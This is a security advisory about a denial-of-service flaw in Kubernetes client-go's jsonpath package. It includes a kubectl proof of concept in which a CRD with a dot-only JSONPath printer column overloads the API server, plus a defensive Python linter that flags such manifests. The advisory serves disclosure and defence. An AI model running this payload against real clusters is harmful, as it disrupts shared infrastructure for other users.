Denial of Service (DoS) Affecting github.com/kubernetes/client-go/util/jsonpath package, versions <0.16.4 >=1.7.6 <1.16.0-beta.1 >=1.17.0-alpha.0 <1.17.0-alpha.1
Snyk ID: SNYK-GOLANG-GITHUBCOMKUBERNETESCLIENTGOUTILJSONPATH-7540855
- published 18 Jul 2024
- disclosed 24 Jul 2020
- credit lazydog
How to fix?
Upgrade github.com/kubernetes/client-go/util/jsonpath to version 0.16.4, 1.16.0-beta.1, 1.17.0-alpha.1 or higher.
Overview
github.com/kubernetes/client-go/util/jsonpath is a template engine using JSONPath syntax, described at http://goessner.net/articles/JsonPath/. In addition, it provides a {range} ... {end} construct for iterating over lists and slices.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD such that listing its custom resources (CRs) causes enormous amounts of CPU usage on the API server.
PoC
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: foos.example.com
spec:
  group: example.com
  scope: Namespaced
  names:
    plural: foos
    singular: foo
    kind: Foo
  version: v1
  additionalPrinterColumns:
  - name: FOO
    type: string
    JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
  name: foo-cr
spec:
  foo:
    bar:
      baz:
        qux: data
EOF
kubectl get foo
The API server's CPU usage increases significantly.
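The durable fix is the upgrade listed under "How to fix?". As a defender-side illustration of the point made in the Overview (whoever can create CRDs controls the JSONPath expression the API server evaluates for every printer column), here is an added example, not code from the Snyk advisory or from the Kubernetes project, that lints a CRD manifest before admission and flags printer-column expressions that are very long or built from runs of dots like the one in the PoC above. It goes a little beyond the PoC by handling both the v1beta1 layout (spec.additionalPrinterColumns, key JSONPath) and the v1 layout (spec.versions[].additionalPrinterColumns, key jsonPath). The thresholds MAX_JSONPATH_LEN and MAX_DOT_RUN, the function names, and both sample manifests are assumptions constructed for this example.

```python
"""Admission-side lint for CustomResourceDefinition manifests.

Flags additionalPrinterColumns entries whose JSONPath expression is unusually
long or consists of long runs of consecutive dots, the shape of the expression
used in the PoC above. Added example for this advisory, not code from Snyk or
from the Kubernetes project; the thresholds and the sample manifests below are
constructed for illustration.
"""
import re
from typing import Dict, Iterator, List, Tuple

# Assumed limits: a legitimate printer-column path is short, and JSONPath only
# ever uses "." (child) or ".." (recursive descent), never three dots in a row.
MAX_JSONPATH_LEN = 256
MAX_DOT_RUN = 2


def longest_dot_run(expr: str) -> int:
    """Length of the longest sequence of consecutive '.' characters in expr."""
    return max((len(run) for run in re.findall(r"\.+", expr)), default=0)


def printer_columns(crd: Dict) -> Iterator[Tuple[str, str]]:
    """Yield (location, jsonpath) for every printer column in a CRD.

    Covers the v1beta1 layout (spec.additionalPrinterColumns, key 'JSONPath')
    and the v1 layout (spec.versions[].additionalPrinterColumns, key 'jsonPath').
    """
    spec = crd.get("spec") or {}
    for i, col in enumerate(spec.get("additionalPrinterColumns") or []):
        expr = col.get("JSONPath") or col.get("jsonPath") or ""
        yield f"spec.additionalPrinterColumns[{i}]", str(expr)
    for v, ver in enumerate(spec.get("versions") or []):
        for i, col in enumerate(ver.get("additionalPrinterColumns") or []):
            expr = col.get("jsonPath") or col.get("JSONPath") or ""
            yield f"spec.versions[{v}].additionalPrinterColumns[{i}]", str(expr)


def lint_crd(crd: Dict) -> List[str]:
    """Return human-readable findings; an empty list means the CRD passes."""
    findings = []
    for loc, expr in printer_columns(crd):
        if len(expr) > MAX_JSONPATH_LEN:
            findings.append(f"{loc}: JSONPath is {len(expr)} chars (limit {MAX_JSONPATH_LEN})")
        run = longest_dot_run(expr)
        if run > MAX_DOT_RUN:
            findings.append(f"{loc}: {run} consecutive dots in JSONPath")
    return findings


# Constructed sample manifests, in the dict form a YAML loader would produce.
BENIGN_CRD = {
    "apiVersion": "apiextensions.k8s.io/v1",
    "kind": "CustomResourceDefinition",
    "spec": {
        "group": "example.com",
        "versions": [{
            "name": "v1",
            "additionalPrinterColumns": [
                {"name": "QUX", "type": "string", "jsonPath": ".spec.foo.bar.baz.qux"},
            ],
        }],
    },
}

# Same shape as the PoC above: a v1beta1 CRD whose column path is only dots.
SUSPICIOUS_CRD = {
    "apiVersion": "apiextensions.k8s.io/v1beta1",
    "kind": "CustomResourceDefinition",
    "spec": {
        "group": "example.com",
        "version": "v1",
        "additionalPrinterColumns": [
            {"name": "FOO", "type": "string", "JSONPath": "." * 300},
        ],
    },
}

if __name__ == "__main__":
    for name, crd in (("benign", BENIGN_CRD), ("suspicious", SUSPICIOUS_CRD)):
        print(name, lint_crd(crd) or "OK")
```

The check is a cheap extra layer for clusters that grant CRD creation to more than cluster administrators (for example in a validating admission webhook or a CI gate on manifests); it does not replace upgrading client-go, since it only recognises the expression shape shown in the PoC and a different expensive expression would pass it.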